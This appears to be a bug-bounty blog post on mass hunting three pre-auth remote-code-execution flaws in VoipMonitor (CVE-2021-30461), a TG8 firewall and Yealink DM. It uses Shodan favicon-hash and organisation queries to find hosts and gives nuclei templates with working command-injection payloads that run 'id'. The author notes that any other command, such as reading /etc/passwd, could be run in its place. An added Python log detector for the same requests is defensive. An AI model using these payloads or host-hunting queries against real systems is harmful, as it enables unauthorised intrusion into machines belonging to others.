3 Pre-Auth RCEs in YeaLink DM, VoipMonitor, TG8 Firewall

Shifa cyclewala
4 min read · May 6, 2021

A Tale of 3 Pre-Auth RCEs.

Hello everyone. In this blog we are going to see how to identify, mass hunt and exploit three pre-auth RCEs in different software products, and how to write nuclei templates for them.

TL;DR

Enough talking, let's start!

Identification of VoipMonitor: (CVE-2021-30461)

Shodan:

Search Query: http.favicon.hash:-124234705

What is the hash?

A favicon hash is a great way to identify hosts running a particular piece of software or CMS. We convert the favicon into a hash and search Shodan for that hash to get specific results.

Results with only the name of the software, without the favicon hash (Shodan search query: VoipMonitor): 8

Results with the favicon hash (http.favicon.hash:-124234705): 615

To hunt for a specific organisation:

Search Query: http.favicon.hash:-124234705 org:"Microsoft Corporation"

Censys:

Search Query: VoipMonitor

Enumerating targets from Shodan using the CLI:

Shodan CLI enumeration results for the favicon hash query.

Writing Nuclei Template: CVE-2021-30461

Now we have the IP addresses running VoipMonitor, and we can test them for the vulnerability.

We are going to now write a nuclei template to test all of them together in one go.

Vulnerable Endpoint:

We will send a POST request to the endpoint /index.php with the body
SPOOLDIR=test%22.system%28id%29.%22

Vulnerable Parameter:
SPOOLDIR=

shifa@Mac-Book-Pro% cat cve-2021–30461-preauth-rce.yaml

nuclei template for VoipMonitor

Breakdown of Template:

requests: This signifies the type of request. Here it is a POST to the target's endpoint:
POST '/index.php'
BODY "SPOOLDIR=test%22.system%28id%29.%22"

Note: URL-decoded version: test".system(id)." We are executing the id command.

matchers: This signifies the matching condition for the output of our payload:
'uid', 'gid', 'groups'

matchers-condition: This signifies that our template should match both the status code 200 in the response and the payload output seen above.

Running Nuclei Template

Template Link: https://github.com/shifa123/mytemplates/tree/main

Writing Nuclei Template TG8 Firewall Pre-Auth RCE: CVE Pending

Identification can be done in the same way using Shodan and Censys, as shown above.

We are going to now write a nuclei template to test all of the targets together in one go.

Vulnerable Endpoint:

We will send a POST request to the endpoint /admin/runphpcmd.php with the body
syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bid%3B++local

Vulnerable Parameter:
syscmd=

shifa@Mac-Book-Pro% cat tg8-pre-auth-rce.yaml

Breakdown of Template:

requests: This signifies the type of request. Here it is a POST to the target's endpoint:
POST 'http://{{Hostname}}/admin/runphpcmd.php'
BODY syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bid%3B++local

Note: URL-decoded, the injected part is ;id; and this is the command we execute.

matchers: This signifies the matching condition for the output of our payload:
'uid', 'gid', 'groups'

matchers-condition: This signifies that our template should match both the status code 200 in the response and the payload output seen above.

Running Nuclei Template

Writing Nuclei Template YeaLink DM Pre-Auth RCE: (CVE-2021-27561/27562)

Identification can be done in the same way using Shodan and Censys, as shown above.

We are going to now write a nuclei template to test all of the targets together in one go.

Vulnerable Endpoint:

We will send a GET request to the endpoint https://{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;

Vulnerable Parameter:
zone=

shifa@Mac-Book-Pro% cat CVE-2021–27562.yaml

Breakdown of Template:

requests: This signifies the type of request. Here it is a GET to the target's endpoint:
GET 'http://{{Hostname}}/premise/front…?zone=;usr/bin/id;'

Note: The command executed here is id; you can execute anything else, such as reading /etc/passwd, to confirm as well. I'm not downloading sensitive files from the server for this demonstration.

matchers: This signifies the matching condition for the output of our payload:
'uid', 'gid', 'groups'

matchers-condition: This signifies that our template should match both the status code 200 in the response and the payload output seen above.

Running Nuclei Template
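The three request shapes above are just as useful on the defending side. As an added example (not code from the original post), here is a small detector that flags each of them in constructed proxy log records; the JSON-lines log shape with client/method/path/query/body fields and the sample records are assumptions.

```python
import json
import re
from urllib.parse import unquote_plus, urlsplit

# Shell metacharacters that never belong in these particular parameters.
SHELL_META = re.compile(r"[;|&`$()]")

def _params(raw: str) -> dict:
    """Split a query string or form body on '&' only and URL-decode each pair."""
    out = {}
    for pair in raw.split("&"):
        key, _, val = pair.partition("=")
        if key:
            out[unquote_plus(key)] = unquote_plus(val)
    return out

def detect(rec: dict) -> list:
    """Return the names of the exploit patterns one request record matches."""
    hits = []
    method, path = rec.get("method", ""), rec.get("path", "")
    body, query = _params(rec.get("body", "")), _params(rec.get("query", ""))
    # VoipMonitor CVE-2021-30461: SPOOLDIR should be a directory path; a quote
    # or a call such as ".system(id)." in the value is PHP code, not a path.
    spool = body.get("SPOOLDIR", "")
    if method == "POST" and path == "/index.php" and ('"' in spool or "(" in spool):
        hits.append("CVE-2021-30461 VoipMonitor SPOOLDIR")
    # TG8 firewall: syscmd is expected to carry only the check_gui_login.sh call.
    syscmd = body.get("syscmd", "")
    if method == "POST" and path == "/admin/runphpcmd.php" and SHELL_META.search(syscmd):
        hits.append("TG8 runphpcmd.php syscmd")
    # Yealink DM CVE-2021-27561/27562: getPingData relays `url` to an internal
    # service whose `zone` parameter reaches a shell, so inspect the inner query.
    zone = _params(urlsplit(query.get("url", "")).query).get("zone", "")
    if method == "GET" and path == "/premise/front/getPingData" and SHELL_META.search(zone):
        hits.append("CVE-2021-27562 Yealink getPingData zone")
    return hits

def scan(lines: list) -> list:
    """Run detect() over JSON-lines records and return (client, hit) pairs."""
    return [(rec.get("client", "?"), hit)
            for rec in map(json.loads, lines) for hit in detect(rec)]

# Constructed sample records (assumed log shape): two benign requests, three exploit attempts.
SAMPLE_LOG = [
    '{"client":"10.0.0.5","method":"POST","path":"/index.php","query":"","body":"SPOOLDIR=%2Fvar%2Fspool%2Fvoipmonitor"}',
    '{"client":"203.0.113.7","method":"POST","path":"/index.php","query":"","body":"SPOOLDIR=test%22.system%28id%29.%22"}',
    '{"client":"203.0.113.7","method":"POST","path":"/admin/runphpcmd.php","query":"","body":"syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bid%3B++local"}',
    '{"client":"10.0.0.9","method":"GET","path":"/premise/front/getPingData","query":"url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=lan","body":""}',
    '{"client":"198.51.100.2","method":"GET","path":"/premise/front/getPingData","query":"url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;","body":""}',
]
```

Running scan(SAMPLE_LOG) yields one finding per exploit attempt and none for the two benign requests, which is the same uid/gid-free signal a WAF or SIEM rule would key on.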

Reporting the Vulnerability

Found the vulnerability in targets and want to send a report? We have got you covered. Copy and use the ready-made reporting templates at https://hacktify.in/bugbounty to invest more time in hunting and less in reporting.

Loved reading this? We teach more such techniques in our Bug Bounty for Beginners Crash Course. 💯🎉🔥

✅ Crash Course Details Here ✅

https://hacktify.in/bugbountycrashcourse

Written by Shifa cyclewala, CEO & Founder at Hacktify Cyber Security